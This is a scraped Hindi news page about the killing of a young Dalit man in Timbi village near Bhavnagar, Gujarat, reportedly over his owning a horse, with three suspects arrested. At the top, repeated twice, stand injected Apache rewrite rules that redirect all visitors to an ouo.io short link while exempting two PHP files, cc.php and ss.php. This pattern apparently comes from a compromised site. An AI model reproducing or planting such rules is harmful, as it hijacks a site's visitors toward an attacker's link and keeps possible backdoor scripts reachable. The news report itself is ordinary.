
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 429
Nextभावनगर। हमारे देश में आज भी ऊंच-नीच के नाम पर लोगों की हत्याएं कर दी जाती हैं। यहां आज भी कई ऐसे इलाके हैं जहां दलित ऊंची जाति के लोगों के सामने सिर उठाकर नहीं चल सकता। ताजा मामले में गुजरात में एक दलित की इसलिए हत्या कर दी, क्योंकि ऊंची जाति बाहुल्य इलाके में उसने घोड़ा रख लिया था। इसे नाक की लड़ाई मानते हुए ऊंची जाति के लोगों ने ना केवल उस दलित की हत्या कर दी बल्कि उसके घोड़े को भी मार डाला।
क्षेत्र के निवासियों ने दावा किया कि उमराला तहसील के टिंबी गांव में इस घटना के बाद तनाव व्याप्त है। पुलिस ने कहा कि पास के गांव से तीन संदिग्धों को गिरफ्तार किया गया है और आगे की जांच के लिए भावनगर अपराध शाखा से मदद मांगी गई है। प्रदीप राठौर (21) ने दो महीने पहले एक घोड़ा खरीदा था और तब से उसके गांववाले उसे धमका रहे थे। गुरुवार देर रात प्रदीप की हत्या कर दी गई।